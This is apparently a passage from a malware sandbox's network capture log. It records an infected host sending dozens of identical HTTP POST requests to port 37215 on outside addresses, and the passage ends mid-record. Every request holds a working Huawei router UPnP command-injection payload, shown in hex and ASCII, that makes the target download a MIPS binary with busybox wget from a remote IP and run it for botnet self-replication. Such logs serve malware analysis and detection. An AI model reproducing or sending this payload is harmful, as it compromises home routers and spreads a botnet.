2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1751192.168.2.1345614197.226.120.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.628915071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1752192.168.2.1344310213.129.168.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.628962994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1753192.168.2.1355616164.210.188.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629024982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1754192.168.2.1360600197.97.11.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629053116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1755192.168.2.1360484197.221.94.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629055023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1756192.168.2.1337386197.156.24.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629070997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1757192.168.2.1338966212.34.189.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629129887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1758192.168.2.1339574205.132.213.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629218102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1759192.168.2.133824841.195.239.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629277945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1760192.168.2.1342698197.142.86.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629281044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1761192.168.2.1359634153.53.214.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629662991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
